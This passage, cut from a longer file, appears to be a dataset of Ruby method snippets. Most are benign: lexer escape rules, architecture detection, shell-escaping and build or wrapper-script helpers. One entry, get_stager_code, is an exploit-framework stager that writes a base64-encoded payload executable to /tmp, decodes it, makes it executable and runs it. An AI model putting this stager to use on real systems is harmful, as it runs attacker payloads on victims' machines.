.. '7' )\n # at line 302:37: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n\n when 2\n # at line 303:9: '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n # at line 303:14: ( '0' .. '7' )\n # at line 303:15: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n # at line 303:25: ( '0' .. '7' )\n # at line 303:26: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n\n when 3\n # at line 304:9: '\\\\\\\\' ( '0' .. '7' )\n match( 0x5c )\n # at line 304:14: ( '0' .. '7' )\n # at line 304:15: '0' .. '7'\n match_range( 0x30, 0x37 )\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 8 )\n\n end",
"def escape_sequence!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 74 )\n\n\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 587:7: ( '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' ) | UnicodeEscape | OctalEscape )\n alt_23 = 3\n look_23_0 = @input.peek( 1 )\n\n if ( look_23_0 == 0x5c )\n case look_23 = @input.peek( 2 )\n when 0x22, 0x27, 0x5c, 0x62, 0x66, 0x6e, 0x72, 0x74 then alt_23 = 1\n when 0x75 then alt_23 = 2\n when 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37 then alt_23 = 3\n else\n raise NoViableAlternative( \"\", 23, 1 )\n\n end\n else\n raise NoViableAlternative( \"\", 23, 0 )\n\n end\n case alt_23\n when 1\n # at line 587:11: '\\\\\\\\' ( 'b' | 't' | 'n' | 'f' | 'r' | '\\\\\\\"' | '\\\\'' | '\\\\\\\\' )\n match( 0x5c )\n if @input.peek(1) == 0x22 || @input.peek(1) == 0x27 || @input.peek(1) == 0x5c || @input.peek(1) == 0x62 || @input.peek(1) == 0x66 || @input.peek(1) == 0x6e || @input.peek(1) == 0x72 || @input.peek(1) == 0x74\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n when 2\n # at line 588:11: UnicodeEscape\n unicode_escape!\n\n\n when 3\n # at line 589:11: OctalEscape\n octal_escape!\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 74 )\n\n\n end",
"def arch(internal = false)\n internal ? '64-bit' : 'x86_64'\n end",
"def e_sh(str)\n str.to_s.gsub(/(?=[^a-zA-Z0-9_.\\/\\-\\x7F-\\xFF\\n])/n, '\\\\').gsub(/\\n/, \"'\\n'\").sub(/^$/, \"''\")\nend",
"def arch\n @header.arch\n end",
"def architecture(file)\n return :invalid unless File.exist?(file)\n\n f = File.open(file)\n str = ELFTools::ELFFile.new(f).machine\n {\n 'Advanced Micro Devices X86-64' => :amd64,\n 'Intel 80386' => :i386,\n 'ARM' => :arm,\n 'AArch64' => :aarch64,\n 'MIPS R3000' => :mips\n }[str] || :unknown\n rescue ELFTools::ELFError # not a valid ELF\n :invalid\n ensure\n f&.close\n end",
"def to_shellwords\n argv = []\n argv << %[--autopath] if autopath?\n argv << %[--verbose] if verbose?\n argv << %[--format=\"#{format}\"] if format\n argv << %[--chdir=\"#{chdir}\"] if chdir\n argv << %[--tags=\"#{tags.join(';')}\"] unless tags.empty?\n argv << %[--match=\"#{match.join(';')}\"] unless match.empty?\n argv << %[--units=\"#{units.join(';')}\"] unless units.empty?\n argv << %[--loadpath=\"#{loadpath.join(';')}\"] unless loadpath.empty?\n argv << %[--requires=\"#{requires.join(';')}\"] unless requires.empty?\n argv << files.join(' ') unless files.empty?\n argv\n end",
"def setup_path\n # The Java Buildpack for WLS creates the complete domain structure and other linkages during staging.\n # The directory used for staging is at /tmp/staged/app. But the actual DEA execution occurs at /home/vcap/app. This discrepancy can result in broken paths and non-startup of the server.\n # So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution\n # Also, this script needs to be invoked before starting the server as it will create the links and also tweak the server args\n # (to listen on correct port, use user supplied jvm args)\n\n File.open(@application.root.to_s + '/' + SETUP_ENV_SCRIPT, 'w') do |f|\n\n f.puts '#!/bin/bash '\n f.puts ' '\n f.puts 'function fcomp() '\n f.puts '{ '\n f.puts ' awk -v n1=$1 -v n2=$2 \\'BEGIN{ if (n1 == n2) print \"yes\"; else print \"no\"}\\' '\n f.puts '} '\n f.puts ' '\n f.puts 'function multiplyArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' mulResult=`echo $input1 $input2 | awk \\'{printf \"%d\", $1*$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function divideArgs() '\n f.puts '{ '\n f.puts ' input1=$1 '\n f.puts ' input2=$2 '\n f.puts ' divResult=`echo $input1 $input2 | awk \\'{printf \"%.2f\", $1/$2}\\' ` '\n f.puts '} '\n f.puts ' '\n f.puts 'function scaleArgs() '\n f.puts '{ '\n f.puts ' inputToken=$1 '\n f.puts ' factor=$2 '\n f.puts ' numberToken=`echo $inputToken | tr -cd [0-9] ` '\n f.puts ' argPrefix=`echo $inputToken | sed -e \\'s/m$//g\\' | tr -cd [a-zA-Z-+:=] ` '\n f.puts ' multiplyArgs $numberToken $factor '\n f.puts ' # Result saved in mulResult variable '\n f.puts ' scaled_number=$mulResult '\n f.puts ' scaled_token=${argPrefix}${scaled_number}m '\n f.puts '} '\n f.puts ' '\n f.puts '# There are 5 things handled by this script '\n f.puts ' '\n f.puts '# 1. Create links to mimic staging env and update scripts with jvm options '\n f.puts '# The Java Buildpack for WLS creates complete domain structure and other linkages during staging at '\n f.puts '# /tmp/staged/app location '\n f.puts '# But the actual DEA execution occurs at /home/vcap/app. '\n f.puts '# This discrepancy can result in broken paths and non-startup of the server. '\n f.puts '# So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution '\n f.puts '# Create paths that match the staging env, as otherwise scripts will break!! '\n f.puts 'if [ ! -d \\\"/tmp/staged\\\" ]; then '\n f.puts ' /bin/mkdir /tmp/staged '\n f.puts 'fi; '\n f.puts 'if [ ! -d \\\"/tmp/staged/app\\\" ]; then '\n f.puts ' /bin/ln -s /home/vcap/app /tmp/staged/app '\n f.puts 'fi; '\n f.puts ' '\n end\n end",
"def get_filecode()\n \"__EMIT_#{ARGV[0].gsub(/[^\\w]/, \"_\").upcase}__\"\nend",
"def octal_escape!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 75 )\n\n\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 594:7: ( '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' ) | '\\\\\\\\' ( '0' .. '7' ) )\n alt_24 = 3\n look_24_0 = @input.peek( 1 )\n\n if ( look_24_0 == 0x5c )\n look_24_1 = @input.peek( 2 )\n\n if ( look_24_1.between?( 0x30, 0x33 ) )\n look_24_2 = @input.peek( 3 )\n\n if ( look_24_2.between?( 0x30, 0x37 ) )\n look_24_4 = @input.peek( 4 )\n\n if ( look_24_4.between?( 0x30, 0x37 ) )\n alt_24 = 1\n else\n alt_24 = 2\n\n end\n else\n alt_24 = 3\n\n end\n elsif ( look_24_1.between?( 0x34, 0x37 ) )\n look_24_3 = @input.peek( 3 )\n\n if ( look_24_3.between?( 0x30, 0x37 ) )\n alt_24 = 2\n else\n alt_24 = 3\n\n end\n else\n raise NoViableAlternative( \"\", 24, 1 )\n\n end\n else\n raise NoViableAlternative( \"\", 24, 0 )\n\n end\n case alt_24\n when 1\n # at line 594:11: '\\\\\\\\' ( '0' .. '3' ) ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n if @input.peek( 1 ).between?( 0x30, 0x33 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n when 2\n # at line 595:11: '\\\\\\\\' ( '0' .. '7' ) ( '0' .. '7' )\n match( 0x5c )\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n when 3\n # at line 596:11: '\\\\\\\\' ( '0' .. '7' )\n match( 0x5c )\n if @input.peek( 1 ).between?( 0x30, 0x37 )\n @input.consume\n else\n mse = MismatchedSet( nil )\n recover mse\n raise mse\n\n end\n\n\n\n end\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 75 )\n\n\n end",
"def bash_on_windows?; end",
"def get_stager_code\r\n b64_fname = \"/tmp/#{Rex::Text.rand_text_alpha(6)}.bin\"\r\n bin_fname = \"/tmp/#{Rex::Text.rand_text_alpha(5)}.bin\"\r\n register_file_for_cleanup(b64_fname, bin_fname)\r\n p = Rex::Text.encode_base64(generate_payload_exe)\r\n\r\n c = \"File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; \"\r\n c << \"%x(base64 --decode #{b64_fname} > #{bin_fname}); \"\r\n c << \"%x(chmod +x #{bin_fname}); \"\r\n c << \"%x(#{bin_fname})\"\r\n c\r\n end",
"def ruby_path_escape( path )\n if (@os == :mac)\n '\"' + path + '\"'\n else\n # Adapt to other OSs if necessary\n '\"' + path + '\"'\n end\n end",
"def cow_to_codename_arch(cow)\n /^base-(.*)-(.*)\\.cow$/.match(cow).captures\n end",
"def build_flags_cross\n # Unclear if we need config_site CONFIG_SITE=/etc/dpkg-cross/cross-config.i386\n [] << '-a' << cross_arch\n end",
"def get_arch\n arch = `uname -m`\n if arch.include?(\"64\")\n return \"64\"\n else\n return \"32\"\n end\nend",
"def machine_arch(arg = nil)\n set_or_return(:machine_arch, arg, kind_of: String, required: true)\n end",
"def linux_version\n case ENV['MACHTYPE']\n when \"s390x-suse-linux\"\n :sles_zlnx\n when /^i[356]86/\n if File.exist? \"/etc/fedora-release\"\n :linux_ia32_cell\n else\n :linux_ia32\n end\n else\n if File.exist? \"/etc/rhel-release\"\n :rhel\n elsif File.exist? \"/etc/redhat-release\"\n `awk '/release 5/||/release 4.9/{v=5};/release 4/{v=4}; END {print \"rhel\" v}' /etc/redhad-release`.to_sym\n elsif File.exist? \"/etc/SuSE-release\"\n `awk '$1==\"VERSION\" { v=$3}; END { print \"sles\" v}' /etc/SuSE-release`.to_sym\n elsif File.exist? \"/etc/yellowdog-release\"\n :yhpc\n else\n :rhel\n end\n end\nend",
"def redhat_linux_type\n if @redhat_linux_type.nil?\n out = nil\n text = FilePath.new(\"/etc/redhat-release\").suck_file\n unless text.nil?\n if text =~ /red\\s*hat/i\n out = \"rh\"\n out += \"el\" if text =~ /enterprise/i\n out += \"es\" if text =~ /\\s+ES\\s+/i\n out += \"%s\" % $1 if text =~ /release\\s+(\\d+)/i\n out += \"-update-%s\" % $1 if text =~ /update\\s+(\\d+)/i\n end\n end\n \n @redhat_linux_type = out\n end\n \n @redhat_linux_type\n end",
"def supported_archs\n @supported_archs ||= Dir.glob(File.join(__dir__, 'consts', 'sys_nr', '*.rb'))\n .map { |f| File.basename(f, '.rb').to_sym }\n .sort\n end",
"def escape_shell_string(str)\n str = str.gsub(/\\\\/, \"\\\\\\\\\\\\\")\n str = str.gsub(/\"/, \"\\\\\\\"\")\n str = str.gsub(/`/, \"\\\\`\")\n str = str.gsub(/;/, \"\\\\;\")\n str = str.gsub(/&/, \"\\\\&\")\n str = str.gsub(/\\|/, \"\\\\|\")\n str = str.gsub(/\\$/, \"\\\\$\")\n str = str.gsub(/ /, \"\\\\ \")\n str\n end",
"def generate_ruby sexp\n ruby = Ruby2Ruby.new.process(sexp)\n ruby.sub!(/\\A(def \\S+)\\(([^\\)]*)\\)/, '\\1 |\\2|') # move args\n ruby.sub!(/\\Adef[^\\n\\|]+/, 'proc { ') # strip def name\n ruby.sub!(/end\\Z/, '}') # strip end\n ruby.gsub!(/\\s+$/, '') # trailing WS bugs me\n ruby\n end",
"def escape_shell(str)\n case RUBY_PLATFORM\n when /mswin32|bccwin32/\n escape_shell_windows(str)\n else\n escape_shell_unix(str)\n end\n end",
"def pre_process_action(action_path, payload_path = nil)\n lb = line_break\n env = @platform_info[\"environment_set\"]\n cmt = @platform_info[\"comment_char\"]\n language = @platform_info[\"language\"]\n shebang = \"\"\n content = File.open(action_path).read\n content = ERB.new(content).result(binding)\n items = content.scan(/^\\s*\\#\\!.*/)\n shebang = items[0] if items.size > 0\n if payload_path\n @transfer_properties[\"RPM_PAYLOAD\"] = payload_path\n end\n env_header = \"#{cmt} Environment vars to define#{lb}\"\n @standard_properties.each{|prop| @transfer_properties[prop] = @p.get(prop) }\n @transfer_properties.each do |key,val|\n env_header += \"#{env}#{key}=#{val}#{lb}\" if language == \"batch\"\n env_header += \"#{env}#{key}=\\\"#{val}\\\"#{lb}\" unless language == \"batch\"\n end\n file_content = \"#{shebang}#{lb}#{env_header}#{lb}#{content}\"\n fil = File.open(action_path,\"w+\")\n fil.puts file_content\n fil.flush\n fil.close\n file_content\n end",
"def arch_to_s\n\t\treturn arch.join(\", \")\n\tend",
"def assembler_options(src, component, system_config)\n config = system_config.platform_config(component.platform)\n output = object_file(src, component, system_config)\n opts = config[\"assembler_options\"].split(\" \")\n opts << \"#{config[\"assembler_out\"]}#{output}\"\n opts += prefixed_objects(component.include_paths, config[\"assembler_include\"])\n opts << src\n end",
"def get_p4_os_directory\n architecture = new_resource.sixty_four ? \"x86_64\" : \"x86\"\n case node[:os]\n when \"linux\"\n os = \"linux26#{architecture}\"\n when \"darwin\"\n os = \"darwin90#{architecture}\"\n when \"windows\"\n architecture = new_resource.sixty_four ? \"x64\" : \"x86\"\n os = \"nt#{architecture}\"\n end\n \"bin.#{os}\"\nend",
"def arch\n if windows? && windows_arch_i386?\n \"i386\"\n elsif solaris?\n if intel?\n \"i386\"\n elsif sparc?\n \"sparc\"\n end\n else\n Ohai[\"kernel\"][\"machine\"]\n end\n end",
"def texify exec_trace\n document_text = \"\"\n File.open \"preamble.tex\" do |file|\n while line = file.gets\n document_text += line\n end\n end\n document_text += \"\\\\begin{document}\\n\"\n stages = get_stages exec_trace\n stages.each do |stage|\n document_text += \"\\\\begin{frame}\\n\\n\"\n document_text += state_text stage.i_heap, stage.i_store\n document_text += \"\\n\"\n document_text += \"Current command: \"\n document_text += \"\\\\il{#{stage.text}}\"\n document_text += \"\\n\"\n document_text += \"\\\\vspace{1cm}\\n\\n\"\n document_text += state_text stage.f_heap, stage.f_store\n document_text += \"\\\\end{frame}\"\n document_text += \"\\n\"\n end\n document_text\nend",
"def parsed_sv_bin\n return new_resource.sv_bin if new_resource.sv_bin\n '/usr/bin/sv'\n end",
"def shabang_or_fallback(interpreter)\n if interpreter == \"/bin/bash\"\n Chef::Log.warn(\"Yum executable interpreter is /bin/bash. Falling back to default python.\")\n \"/usr/bin/python\"\n else\n interpreter\n end\n end",
"def interpret(source)\n c = compile(source)\n ci = cifrom(c)\n ci.run\nend",
"def make_universal(file_path, this_arch, other_arch)\n other_arch_file = file_path.sub(this_arch, other_arch) # create file path for other architecture...\n universal_file = file_path.sub(this_arch, 'universal') # ...and universal architecture\n run_cmd \"lipo #{file_path} #{other_arch_file} -create -output #{universal_file}\"\n run_cmd \"lipo -info #{universal_file}\"\n end",
"def build_wrapper_script(os_platform, shebang, properties)\n msg = \"Environment variables from BRPM\"\n wrapper = \"srun_wrapper_#{@rpm.precision_timestamp}\"\n cmd = shebang[\"cmd\"]\n target = File.basename(@params[\"SS_script_file\"])\n cmd = cmd.gsub(\"%%\", target) if shebang[\"cmd\"].end_with?(\"%%\")\n cmd = \"#{cmd} #{target}\" unless shebang[\"cmd\"].end_with?(\"%%\")\n if os_platform =~ /win/\n properties[\"RPM_CHANNEL_ROOT\"] = @rpm.dos_path(properties[\"RPM_CHANNEL_ROOT\"])\n properties[\"VL_CHANNEL_ROOT\"] = properties[\"RPM_CHANNEL_ROOT\"]\n wrapper = \"#{wrapper}.bat\"\n script = \"@echo off\\r\\necho |hostname > junk.txt\\r\\nset /p HOST=<junk.txt\\r\\nrm junk.txt\\r\\n\"\n script += \"echo ============== HOSTNAME: %HOST% ==============\\r\\n\"\n script += \"echo #{msg} \\r\\n\"\n properties.each{|k,v| script += \"set #{k}=#{v}\\r\\n\" }\n script += \"echo Execute the file\\r\\n\"\n script += \"cd %RPM_CHANNEL_ROOT%\\r\\n\"\n script += \"#{cmd}\\r\\n\"\n script += \"timeout /T 500\\r\\necho y | del #{target}\\r\\n\"\n else\n wrapper = \"#{wrapper}.sh\"\n script = \"echo \\\"============== HOSTNAME: `hostname` ==============\\\"\\n\"\n script += \"echo #{msg} \\n\"\n properties.each{|k,v| script += \"export #{k}=\\\"#{v}\\\"\\n\" }\n script += \"echo Execute the file\\n\"\n script += \"cd $RPM_CHANNEL_ROOT\\n\"\n script += \"#{cmd}\\n\" \n script += \"sleep 2\\nrm -f #{target}\" \n end\n fil = File.open(File.join(@output_dir, wrapper),\"w+\")\n fil.puts script\n fil.flush\n fil.close\n File.join(@output_dir, wrapper)\nend",
"def gene_compatible_shell\n \trequire 'find'\n \trequire 'json'\n \tshells = {}\n \t#Read shells' info from SPEC files\n \tFind.find(File.expand_path(\"#{Dir.home}/.hcode/repos/\")) do |path|\n \t if path =~ /.*hcode\\.spec$/\n \t json = File.read(path)\n spec = JSON.parse(json)\n \t if(spec[\"type\"] == \"shell\")\n \t shell = {}\n \t shell[:name] = spec[\"name\"]\n shell[:compatible_shell] = Hash.new\n \t if (spec[\"compatible_shell\"] != nil)\n \t spec[\"compatible_shell\"].each{|k, v|\n \t shell[:compatible_shell][k] = v\n \t }\n \t end\n \t shells[shell[:name]] = shell\n \t end\n \t end\n \tend\n\n shells.each{|k_i,v_i|\n v_i[:compatible_shell].each{|k_j, v_j|\n if(shells[k_j] != nil)\n shells[k_j][:compatible_shell][k_i] = v_j\n else\n puts \"No shell exist: #{k_j}\"\n end\n }\n }\n\n File.open(File.expand_path(\"#{Dir.home}/.hcode/compatible_shell.json\"), 'w') { |fo| \n fo.puts shells.to_json\n }\n end",
"def get_linux_version_info(iso_file_name)\n iso_info = File.basename(iso_file_name)\n if iso_file_name.match(/purity/)\n iso_info = iso_info.split(/_/)\n else\n iso_info = iso_info.split(/-/)\n end\n linux_distro = iso_info[0]\n linux_distro = linux_distro.downcase\n if linux_distro.match(/^sle$/)\n linux_distro = \"sles\"\n end\n if linux_distro.match(/oraclelinux/)\n linux_distro = \"oel\"\n end\n if linux_distro.match(/centos|ubuntu|sles|sl|oel|rhel/)\n if linux_distro.match(/sles/)\n if iso_info[2].match(/Server/)\n iso_version = iso_info[1]+\".0\"\n else\n iso_version = iso_info[1]+\".\"+iso_info[2]\n iso_version = iso_version.gsub(/SP/,\"\")\n end\n else\n if linux_distro.match(/sl$/)\n iso_version = iso_info[1].split(//).join(\".\")\n if iso_version.length == 1\n iso_version = iso_version+\".0\"\n end\n else\n if linux_distro.match(/oel|rhel/)\n if iso_file_name =~ /-rc-/\n iso_version = iso_info[1..3].join(\".\")\n iso_version = iso_version.gsub(/server/,\"\")\n else\n iso_version = iso_info[1..2].join(\".\")\n iso_version = iso_version.gsub(/[a-z,A-Z]/,\"\")\n end\n iso_version = iso_version.gsub(/^\\./,\"\")\n else\n iso_version = iso_info[1]\n end\n end\n end\n case iso_file_name\n when /i[3-6]86/\n iso_arch = \"i386\"\n when /x86_64/\n iso_arch = \"x86_64\"\n else\n if linux_distro.match(/centos|sl$/)\n iso_arch = iso_info[2]\n else\n if linux_distro.match(/sles|oel/)\n iso_arch = iso_info[4]\n else\n iso_arch = iso_info[3]\n iso_arch = iso_arch.split(/\\./)[0]\n if iso_arch.match(/amd64/)\n iso_arch = \"x86_64\"\n else\n iso_arch = \"i386\"\n end\n end\n end\n end\n else\n if linux_distro.match(/fedora/)\n iso_version = iso_info[1]\n iso_arch = iso_info[2]\n else\n if linux_distro.match(/purity/)\n iso_version = iso_info[1]\n iso_arch = \"x86_64\"\n else\n if linux_distro.match(/vmware/)\n iso_version = iso_info[3].split(/\\./)[0..-2].join(\".\")\n iso_update = iso_info[3].split(/\\./)[-1]\n iso_release = iso_info[4].split(/\\./)[-3]\n iso_version = iso_version+\".\"+iso_update+\".\"+iso_release\n iso_arch = \"x86_64\"\n else\n iso_version = iso_info[2]\n iso_arch = iso_info[3]\n end\n end\n end\n end\n return linux_distro,iso_version,iso_arch\nend",
"def build\n so_name = self.so_name\n so_exists = File.file? so_name\n unless so_exists and File.mtime(rb_file) < File.mtime(so_name) then\n\n unless File.directory? Inline.directory then\n warn \"NOTE: creating #{Inline.directory} for RubyInline\" if $DEBUG\n Dir.mkdir Inline.directory, 0700\n end\n\n src_name = \"#{Inline.directory}/#{module_name}.c\"\n old_src_name = \"#{src_name}.old\"\n should_compare = File.write_with_backup(src_name) do |io|\n if @include_ruby_first\n @inc.unshift \"#include \\\"ruby.h\\\"\"\n else\n @inc.push \"#include \\\"ruby.h\\\"\"\n end\n\n io.puts\n io.puts @inc.join(\"\\n\")\n io.puts\n io.puts @src.join(\"\\n\\n\")\n io.puts\n io.puts\n io.puts \"#ifdef __cplusplus\"\n io.puts \"extern \\\"C\\\" {\"\n io.puts \"#endif\"\n io.puts \" __declspec(dllexport)\" if WINDOZE\n io.puts \" void Init_#{module_name}() {\"\n io.puts \" VALUE c = rb_cObject;\"\n\n # TODO: use rb_class2path\n # io.puts \" VALUE c = rb_path2class(#{@mod.name.inspect});\"\n io.puts @mod.name.split(\"::\").map { |n|\n \" c = rb_const_get(c,rb_intern(\\\"#{n}\\\"));\"\n }.join(\"\\n\")\n\n @sig.keys.sort.each do |name|\n arity, singleton, method_name = @sig[name]\n if singleton then\n io.print \" rb_define_singleton_method(c, \\\"#{method_name}\\\", \"\n else\n io.print \" rb_define_method(c, \\\"#{method_name}\\\", \"\n end\n io.puts \"(VALUE(*)(ANYARGS))#{name}, #{arity});\"\n end\n io.puts @init_extra.join(\"\\n\") unless @init_extra.empty?\n\n io.puts\n io.puts \" }\"\n io.puts \"#ifdef __cplusplus\"\n io.puts \"}\"\n io.puts \"#endif\"\n io.puts\n end\n\n # recompile only if the files are different\n recompile = true\n if so_exists and should_compare and\n FileUtils.compare_file(old_src_name, src_name) then\n recompile = false\n\n # Updates the timestamps on all the generated/compiled files.\n # Prevents us from entering this conditional unless the source\n # file changes again.\n t = Time.now\n File.utime(t, t, src_name, old_src_name, so_name)\n end\n\n if recompile then\n\n hdrdir = %w(srcdir archdir rubyhdrdir).map { |name|\n Config::CONFIG[name]\n }.find { |dir|\n dir and File.exist? File.join(dir, \"/ruby.h\")\n } or abort \"ERROR: Can't find header dir for ruby. Exiting...\"\n\n flags = @flags.join(' ')\n libs = @libs.join(' ')\n\n config_hdrdir = if RUBY_VERSION > '1.9' then\n \"-I #{File.join hdrdir, RbConfig::CONFIG['arch']}\"\n else\n nil\n end\n\n cmd = [ Config::CONFIG['LDSHARED'],\n flags,\n Config::CONFIG['CCDLFLAGS'],\n Config::CONFIG['CFLAGS'],\n '-I', hdrdir,\n config_hdrdir,\n '-I', Config::CONFIG['includedir'],\n \"-L#{Config::CONFIG['libdir']}\",\n '-o', so_name.inspect,\n File.expand_path(src_name).inspect,\n libs,\n crap_for_windoze ].join(' ')\n\n # TODO: remove after osx 10.5.2\n cmd += ' -flat_namespace -undefined suppress' if\n RUBY_PLATFORM =~ /darwin9\\.[01]/\n cmd += \" 2> #{DEV_NULL}\" if $TESTING and not $DEBUG\n\n warn \"Building #{so_name} with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? != 0 then\n bad_src_name = src_name + \".bad\"\n File.rename src_name, bad_src_name\n raise CompilationError, \"error executing #{cmd.inspect}: #{$?}\\nRenamed #{src_name} to #{bad_src_name}\"\n end\n\n # NOTE: manifest embedding is only required when using VC8 ruby\n # build or compiler.\n # Errors from this point should be ignored if Config::CONFIG['arch']\n # (RUBY_PLATFORM) matches 'i386-mswin32_80'\n if WINDOZE and RUBY_PLATFORM =~ /_80$/ then\n Dir.chdir Inline.directory do\n cmd = \"mt /manifest lib.so.manifest /outputresource:so.dll;#2\"\n warn \"Embedding manifest with '#{cmd}'\" if $DEBUG\n result = `#{cmd}`\n warn \"Output:\\n#{result}\" if $DEBUG\n if $? != 0 then\n raise CompilationError, \"error executing #{cmd}: #{$?}\"\n end\n end\n end\n\n warn \"Built successfully\" if $DEBUG\n end\n\n else\n warn \"#{so_name} is up to date\" if $DEBUG\n end # unless (file is out of date)\n end",
"def target_ruby; end",
"def transcode_script_header\n <<~HEREDOC\n #!/bin/sh\n\n # Check this file, make any changes, and save it. Execute it directly,\n # or execute it with the sh command if it's not executable.\n\n set -e\n\n HEREDOC\n end",
"def repack_linux arch\n @options['app'] = $script_path\n @options['arch'] = arch\n @options['dnlhost'] = @dnlhost\n @options['dnlpath'] = \"/public/select/#{arch}.rb\"\n @options['packtmp'] = LIB_DIR\n @options['relname'] = Shoes::RELEASE_NAME\n @options['shoesdist'] = @work_path\n PackShoes.repack_linux @options do |msg|\n @pkgstat.text = msg\n end\n @pkgstat = inscription \"Done packaging #{$script_path} for Linux #{arch}\"\n end",
"def patch_wrapper_script(prog)\n\t\twrapper_script_header = <<-WRAPPER_SCRIPT_HEADER\n#!/bin/bash\n\nexport LANG=en_US.UTF-8\nexport LANGUAGE=en_US.UTF-8\nexport LC_ALL=en_US.UTF-8\n\nCOMMONSDIR=\"#{HOMEBREW_PREFIX.join('opt', 'hets-commons')}\"\nPROGDIR=\"#{prefix}\"\nPROG=\"#{prog}\"\n\n[[ -z ${HETS_JNI_LIBS} ]] && \\\\\n\t\t HETS_JNI_LIBS=\"#{HOMEBREW_PREFIX.join('opt', 'factplusplus')}\"\nWRAPPER_SCRIPT_HEADER\n\n\t\t# Replace the header until (including) the line starting with PROG=\n\t\tinreplace(bin.join(prog), /\\A.*PROG=[^\\n]*$/m, wrapper_script_header)\n inreplace(bin.join(prog), 'BASEDIR', 'COMMONSDIR')\n inreplace(bin.join(prog), /PELLET_PATH=.*$/, \"PELLET_PATH=#{HOMEBREW_PREFIX.join('opt', 'pellet', 'bin')}\")\n inreplace(bin.join(prog), /^\\s*exec\\s+([\"']).*COMMONSDIR[^\\/]*/, 'exec \\1${PROGDIR}')\n end",
"def d(ruby_str)\n puts RubyVM::InstructionSequence.new(ruby_str).disasm\nend",
"def actual_arch\n arch = nil\n\n if explicit_arch.nil? == false\n arch = explicit_arch\n elsif datastore['ARCH']\n arch = datastore['ARCH']\n elsif assoc_exploit\n arch = assoc_exploit.target_arch || ARCH_X86\n end\n\n # If we still have an invalid architecture, then we suck.\n if arch.nil?\n raise NoCompatiblePayloadError, \"An architecture could not be determined by the generic payload\"\n elsif arch.kind_of?(String)\n arch = [ arch ]\n end\n\n return arch\n end",
"def pre_build\n puts \"pre_build dir=#{`pwd`}\"\n rbvt = RUBY_V\n rbvm = RUBY_V[/^\\d+\\.\\d+/]\n mkdir_p \"#{TGT_DIR}/lib\"\n # clean out leftovers from last build\n rm_f \"#{TGT_DIR}/libruby.so\" if File.exist? \"#{TGT_DIR}/libruby.so\"\n rm_f \"#{TGT_DIR}/libruby.so.#{rbvm}\" if File.exist? \"#{TGT_DIR}/libruby.so.#{rbvm}\"\n rm_f \"#{TGT_DIR}/libruby.so.#{rbvt}\" if File.exist? \"#{TGT_DIR}/libruby.so.#{rbvt}\"\n cp_r \"#{EXT_RUBY}/lib/ruby\", \"#{TGT_DIR}/lib\"\n # copy and link libruby.so - pick the right one to \n # cp \"#{EXT_RUBY}/lib/libruby.so.#{RUBY_V}\", \"#{TGT_DIR}\"\n cp \"#{EXT_RUBY}/lib/libruby.so.#{rbvm}\", \"#{TGT_DIR}\"\n # copy include files - it might help build gems\n mkdir_p \"#{TGT_DIR}/lib/ruby/include/ruby-#{rbvt}\"\n cp_r \"#{EXT_RUBY}/include/ruby-#{rbvt}/\", \"#{TGT_DIR}/lib/ruby/include\"\n # can't figure out ln -s? push pwd, cd, ln, pop\n #cdir = pwd\n #cd TGT_DIR\n chdir TGT_DIR do\n ln_s \"libruby.so.#{rbvm}\", \"libruby.so\"\n #ln_s \"libruby.so.#{RUBY_V}\", \"libruby.so.#{::RUBY_V[/^\\d+\\.\\d+/]}\"\n end\n SOLOCS.each_value do |path|\n cp \"#{path}\", \"#{TGT_DIR}\"\n end\n end",
